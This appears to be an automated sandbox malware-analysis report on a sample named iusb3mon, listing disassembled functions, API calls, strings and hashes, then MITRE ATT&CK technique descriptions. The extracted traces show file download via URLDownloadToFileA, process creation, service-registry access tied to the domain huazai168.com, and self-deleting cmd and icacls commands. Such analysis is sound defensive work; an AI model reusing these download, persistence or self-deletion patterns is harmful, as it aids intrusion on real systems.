Function 04D71606 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 181COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D7160B

Strings

bad Allocate, xrefs: 04D717C9
bad buffer, xrefs: 04D716C5

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: bad Allocate$bad buffer
API String ID: 3519838083-2913219628
Opcode ID: a36b2ea4ed594d3cac77e55b4dd1e17e4756014fcfe594f8b97452bd50ae3c5f
Instruction ID: 294053fe1f92c8b4212f7629d5732721e9a21b52d462f830327164e05d26d118
Opcode Fuzzy Hash: a36b2ea4ed594d3cac77e55b4dd1e17e4756014fcfe594f8b97452bd50ae3c5f
Instruction Fuzzy Hash: B1516871B00119ABEF15EFA4C8919EEBBF9FF44708F50411AE505A7290FB74BA44CBA1

Function 00571EA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 157COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0057202F

Part of subcall function 00576F34: RaiseException.KERNEL32(E06D7363,00000001,00000003,005711FC,?,?,?,?,005711FC,?,0059A814), ref: 00576F94

Strings

ios_base::failbit set, xrefs: 00571EC8
ios_base::badbit set, xrefs: 00571FC7, 00571FF2, 00572013

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 3109751735-1240500531
Opcode ID: 76e772d77e06055e773f265cf7a87c3bccd1b5f0ec665755c7aa4f74833e1bac
Instruction ID: 2ee5e7ec1ac38566af71861c13f27bbf6261b6d4fcdbfe4e16fb9bcbb773ce1c
Opcode Fuzzy Hash: 76e772d77e06055e773f265cf7a87c3bccd1b5f0ec665755c7aa4f74833e1bac
Instruction Fuzzy Hash: 975127B1910608ABCB04DF68DC45BAEFBF8FF44310F14C21AF819A7681E730A944DBA5

Function 04D7E2C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 04D7E2D4

Strings

, xrefs: 04D7E2F9
, xrefs: 04D7E31D

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 3ea571f712b9ddbb13ae05535718b8db1535ec3497019f7dad427c7ce2df4c82
Instruction ID: f7fa1c0db9535896861bc095b3ca7b128cef27448b1c1a508f3c88e6d5103c7e
Opcode Fuzzy Hash: 3ea571f712b9ddbb13ae05535718b8db1535ec3497019f7dad427c7ce2df4c82
Instruction Fuzzy Hash: A541BB315442585FEB11D724CC59BEA3FE8EF01708F0804E4E98ACB192E335DA58EBB2

Function 04D74498 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72processCOMMON

Download Yara Rule

APIs

Part of subcall function 04D76316: DeleteFileA.KERNEL32(?,04D744DD,00000000,00000001), ref: 04D76344
Part of subcall function 04D76316: LoadLibraryA.KERNEL32(wininet.dll), ref: 04D76357
Part of subcall function 04D76316: GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 04D7636E
Part of subcall function 04D76316: InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 04D7638E
Part of subcall function 04D76316: GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 04D7639A
Part of subcall function 04D76316: FreeLibrary.KERNEL32(00000000), ref: 04D763BC

Part of subcall function 04D795BC: GetFileAttributesA.KERNEL32(04D75CC4,04D75CC4,00000000), ref: 04D795C0
Part of subcall function 04D795BC: GetLastError.KERNEL32 ref: 04D795CB

CreateProcessA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 04D74519

Strings

WinSta0\Default, xrefs: 04D74512
D, xrefs: 04D744FC

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressFileLibraryProc$AttributesConnectCreateDeleteErrorFreeInternetLastLoadProcess
String ID: D$WinSta0\Default
API String ID: 1472976565-1101385590
Opcode ID: a73f84003dacbfe5b6d5736f53bfc6a2d8d80a01e1f3c4fa7da67f9c692f58c3
Instruction ID: a1e8cfd8001602694888b820c1ead2aae54705f043774ba0602399bd8e4e73ba
Opcode Fuzzy Hash: a73f84003dacbfe5b6d5736f53bfc6a2d8d80a01e1f3c4fa7da67f9c692f58c3
Instruction Fuzzy Hash: 7001C4B37011257AFB11AAE49C48EEF7BACEF05364F100426FA01E6141FA74BA0586F1

Function 04D75C32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71filenetworkCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 04D75C98
URLDownloadToFileA.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 04D75CAE

Part of subcall function 04D795BC: GetFileAttributesA.KERNEL32(04D75CC4,04D75CC4,00000000), ref: 04D795C0
Part of subcall function 04D795BC: GetLastError.KERNEL32 ref: 04D795CB

Part of subcall function 04D75AA1: RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000), ref: 04D75AEA
Part of subcall function 04D75AA1: RegQueryValueA.ADVAPI32(00000000,00000000,?,04D75CD7), ref: 04D75B09
Part of subcall function 04D75AA1: RegCloseKey.ADVAPI32(00000000,?,?,?,00000000,00000000), ref: 04D75B14
Part of subcall function 04D75AA1: wsprintfA.USER32 ref: 04D75B3C
Part of subcall function 04D75AA1: RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,00000000), ref: 04D75B5C

Strings

c:\%s, xrefs: 04D75C92

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FileOpenwsprintf$AttributesCloseDownloadErrorLastQueryValue
String ID: c:\%s
API String ID: 2251979229-3279930864
Opcode ID: d2baf9bd39571527b49c9c98f2bd1515358da72e52dd5c91f7a4a18b897ff4d1
Instruction ID: 1fef4f2264641a108ce44ae3e13ad75b65ac41eea4f49a6ca21acc9cc52777df
Opcode Fuzzy Hash: d2baf9bd39571527b49c9c98f2bd1515358da72e52dd5c91f7a4a18b897ff4d1
Instruction Fuzzy Hash: 62110A737053247AFB20A6B49C88FEB3BECEF44354F140469F605E1041FA64BA444AA1

Function 04D7708C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,000F003F,04D76C72,?,?,?,huazai168.com), ref: 04D770E9

Strings

SYSTEM\CurrentControlSet\Services\, xrefs: 04D770B3
huazai168.com, xrefs: 04D7709C

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Open
String ID: SYSTEM\CurrentControlSet\Services\$huazai168.com
API String ID: 71445658-1872475541
Opcode ID: bbc8a510e5d84bdc3197d7e214c44503eb28c05d097bda310345e58723a7020c
Instruction ID: 5859b545414ba980f61824ec730cc4d9c0a1a6b915e90e06240f421906f8eda2
Opcode Fuzzy Hash: bbc8a510e5d84bdc3197d7e214c44503eb28c05d097bda310345e58723a7020c
Instruction Fuzzy Hash: 21F08276B582187BEB60D6B4DC06FE973ACD714744F1008A5B289F1081EAF4BAC88E25

Function 00571280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00571285

Part of subcall function 00573A15: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00573A21

___std_exception_copy.LIBVCRUNTIME ref: 005712AE

Strings

string too long, xrefs: 00571280

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: Xinvalid_argument___std_exception_copystd::_std::invalid_argument::invalid_argument
String ID: string too long
API String ID: 1846318660-2556327735
Opcode ID: 2ee2d1b97e02a5451ae87a43ab0eb1573c8ccec7ce3941b48e4c22d0d4a029d2
Instruction ID: e45d2c606a5fd9d1b52f778b60e9120586fe76108646769a5960aa16146b2dac
Opcode Fuzzy Hash: 2ee2d1b97e02a5451ae87a43ab0eb1573c8ccec7ce3941b48e4c22d0d4a029d2
Instruction Fuzzy Hash: BAE0867251031557C610AFD8EC02841BAECFE56710710C526F688E7600F770A54093A5

Function 04D73FAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6processCOMMON

Download Yara Rule

APIs

Part of subcall function 04D73DF2: WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone",00000000), ref: 04D73E0C
Part of subcall function 04D73DF2: WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 04D73E14
Part of subcall function 04D73DF2: DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 04D73E1B
Part of subcall function 04D73DF2: Sleep.KERNEL32(c:\del,?,?), ref: 04D73E38
Part of subcall function 04D73DF2: Sleep.KERNEL32(C:\ProgramData\Microsoft\del.bat,?,?), ref: 04D73E4B
Part of subcall function 04D73DF2: WinExec.KERNEL32(C:\ProgramData\Microsoft\del.bat,00000000), ref: 04D73E53
Part of subcall function 04D73DF2: Sleep.KERNEL32(000003E8,?,?), ref: 04D73E5A
Part of subcall function 04D73DF2: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 04D73E6A
Part of subcall function 04D73DF2: GetShortPathNameA.KERNEL32(?,?,00000104), ref: 04D73E83
Part of subcall function 04D73DF2: GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,?), ref: 04D73E9A

WinExec.KERNEL32(cmd /c echo.>c:\del & exit,00000000), ref: 04D73FBA
ExitProcess.KERNEL32 ref: 04D73FC2

Strings

cmd /c echo.>c:\del & exit, xrefs: 04D73FB5

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Exec$Sleep$FileName$DeleteEnvironmentExitModulePathProcessShortVariable
String ID: cmd /c echo.>c:\del & exit
API String ID: 253100718-3921158289
Opcode ID: 4c4a68db0130038390f2062b31271c297cd8c322dd113eb9a7d1c8796a2c0a9a
Instruction ID: cca3e29c73c3400dea8c5f1a5f41a84281ff51023bd714605cbe51bd2226dd3d
Opcode Fuzzy Hash: 4c4a68db0130038390f2062b31271c297cd8c322dd113eb9a7d1c8796a2c0a9a
Instruction Fuzzy Hash: C4B012303B0201FBE30037A09C1FF383B10E700B02F04D008F205E81C0AE942C008E21

Function 04D7F4EE Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,04D7F2B6,00000000,00000000,00000000,04D7AD29,00000000,00000000,04D78D56,00000000,00000000,00000000), ref: 04D7F516
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,04D7F2B6,00000000,00000000,00000000,04D7AD29,00000000,00000000,04D78D56,00000000,00000000,00000000), ref: 04D7F54A
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 04D7F564
HeapFree.KERNEL32(00000000,?), ref: 04D7F57B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: 51cf84c927ae1e4b40d5930f2ce5e09966f28e24f07a32fc8b31f59184d26b8c
Instruction ID: ef9ac00a71078b4b18b724f1a831b456679b4c2130bc578c679a5a78924b11fa
Opcode Fuzzy Hash: 51cf84c927ae1e4b40d5930f2ce5e09966f28e24f07a32fc8b31f59184d26b8c
Instruction Fuzzy Hash: 35115170A002019FD7349F19EC599667BF5FF84720B500A2DF552D6A90D378ADA5DF00

Function 04D8C9FF Relevance: 5.0, APIs: 4, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(04DA6740,?,00000000,?,?,04D8C8E5,00000010,?,00000100,?,?,?,04D8C4A4,04D8C4EB,04D8C4D2,04D887DA), ref: 04D8CA3A
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,04D8C8E5,00000010,?,00000100,?,?,?,04D8C4A4,04D8C4EB,04D8C4D2,04D887DA), ref: 04D8CA4C
LeaveCriticalSection.KERNEL32(04DA6740,?,00000000,?,?,04D8C8E5,00000010,?,00000100,?,?,?,04D8C4A4,04D8C4EB,04D8C4D2,04D887DA), ref: 04D8CA55
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,04D8C8E5,00000010,?,00000100,?,?,?,04D8C4A4,04D8C4EB,04D8C4D2,04D887DA,00000100), ref: 04D8CA67

Part of subcall function 04D8C9BA: GetVersion.KERNEL32(?,04D8CA0F,?,04D8C8E5,00000010,?,00000100,?,?,?,04D8C4A4,04D8C4EB,04D8C4D2,04D887DA,00000100,04D88773), ref: 04D8C9CD

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: a473361611fe067e7858c4fc6d08a9016afa05d55cf1ae7e0405ff93ccff2c0c
Instruction ID: 7b543c0becbdc3491dac95470b05bdb9e11fffc98c7a4c12d765476ec0c58651
Opcode Fuzzy Hash: a473361611fe067e7858c4fc6d08a9016afa05d55cf1ae7e0405ff93ccff2c0c
Instruction Fuzzy Hash: 32F0447141221AEFC710EF64E8E4966B3ADF704716B08443ED65592101D738F865CAA1

Function 04D7CF5F Relevance: 5.0, APIs: 4, Instructions: 12COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,04D7CD22,?,04D7B623), ref: 04D7CF6C
InitializeCriticalSection.KERNEL32 ref: 04D7CF74
InitializeCriticalSection.KERNEL32 ref: 04D7CF7C
InitializeCriticalSection.KERNEL32 ref: 04D7CF84

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: d188534f56ed5762de5f589676eb2f67dbe61e1236373b44a332ab42557956d6
Instruction ID: f3876d12a9ebc0ed35528604a93a62109a467f70b773036a8a6aa7af799459d7
Opcode Fuzzy Hash: d188534f56ed5762de5f589676eb2f67dbe61e1236373b44a332ab42557956d6
Instruction Fuzzy Hash: 71C00231911178AACB51AB55FC688457F65EB453613114176E504D12B08E391D51DFC0

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

